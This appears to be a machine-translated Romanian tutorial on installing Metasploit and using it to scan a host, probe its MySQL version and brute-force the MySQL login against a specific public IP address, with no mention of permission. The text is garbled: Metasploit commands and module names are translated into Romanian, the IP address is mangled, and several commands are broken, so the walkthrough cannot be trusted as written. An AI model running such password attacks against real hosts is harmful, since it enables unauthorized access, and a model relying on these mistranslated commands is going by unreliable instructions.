Cuprins
Cadrul Metasploit, este un instrument pentru a dezvolta și a executa exploit-uri împotriva unui computer sau server. Metasploit Framework a fost scris în limba Ruby, este multiplatform și necesită un computer puternic pentru a rula, există o versiune cu plată și o versiune gratuită pentru comunitate.Poate fi descărcat de pe www.metasploit.com/framework/download
Vom instala în Linux Ubutnu, dar funcționează pentru alte distribuții prin schimbarea unor comenzi.
Accesăm fereastra terminalului și instalăm ruby, înainte să funcționeze cu perl, dar a fost programat complet nou.
Instalăm dependențele de rubin, astfel încât să putem rula apoi cadrul.
sudo apt-get install ruby libruby rdoc sudo apt-get install libyaml-ruby sudo apt-get install libzlib-ruby sudo apt-get install libopenssl-ruby sudo apt-get install libdl-ruby sudo apt-get install libreadline-ruby sudo apt -get install libiconv-ruby sudo apt-get install rubygems * sudo apt-get install libgtk2-ruby libglade2-ruby
Apoi, în funcție de versiunea pe care o descărcăm pe 32 sau 64 de biți de la termink, vom da permisiunea:
chmod + x metasploit-latest-linux-x64-installer.run
Rulăm programul de instalare și se va deschide fereastra de instalare:
sudo metasploit-latest-linux-x64-installer.run
La sfârșitul instalării din fereastra terminalului și cu acces root actualizăm cadrul
cu comanda:
msfupdate
Metasploit este un program fără mediu grafic care rulează complet în terminal. Accesăm software-ul de la terminal cu comanda:
msfconsole
Cunoașterea MSF intern
MSF (Metasploit Framework) Este structurat într-o serie de module precum:
Exploatări Care sunt scripturile și programele disponibile în MSF și pe care le putem folosi, acestea sunt organizate în funcție de sistem de operare și categorii, de exemplu exploit / windows / browser / care sunt exploit-urile disponibile pentru browserele care rulează pe Windows.
Sarcini utile: Acțiunea va fi efectuată dacă vulnerabilitatea pe care o testăm poate fi găsită și exploatată.
Auxiliar: scripturile auxiliare cu funcții diferite, cum ar fi auxiliar / scanner / portscan / tcp și folosind acest scaner de port tcp, am obține starea portului. Acest script este o alternativă la Nmap.
Minune: Sunt scripturi de codificare pentru a se sustrage unor antivirus și antispammer.
Începem un exemplu de test, de la terminal executăm:./msfconsole
Vom începe prin scanarea unui ip cu nmap
msf> nmap -sV 190.155.80.110
Activăm modulul auxiliar pentru a accesa instrumentele de script care vor permite lucrul la MySQL. Putem vedea și versiunea modulului.
msf> auxiliar (mysql_version)> set RHOSTS 190.155.80.110 // set ip remote remote msf> set RHOSTS 192.155.80.110 msf> auxiliar (mysql_version)> run // verificați versiunea mysql
Dacă este executat corect, poate returna versiunea mysql:
[*] 190.155.80.110 rulează Mysql5.0
Un alt caz cu modulul de scanare și încercarea de a schimba utilizatorul root al mysql:
msf> utilizați scanner / mysql / mysql_login msf> setați USERNAME admin msf> setați PASS_FILE /tmp/keys.lst // fișier text cu chei posibile una sub cealaltă msf> exploit
Dacă funcționează, ne putem conecta la mysql:
mysql -h 1920,155,80,110 -u admin -pkey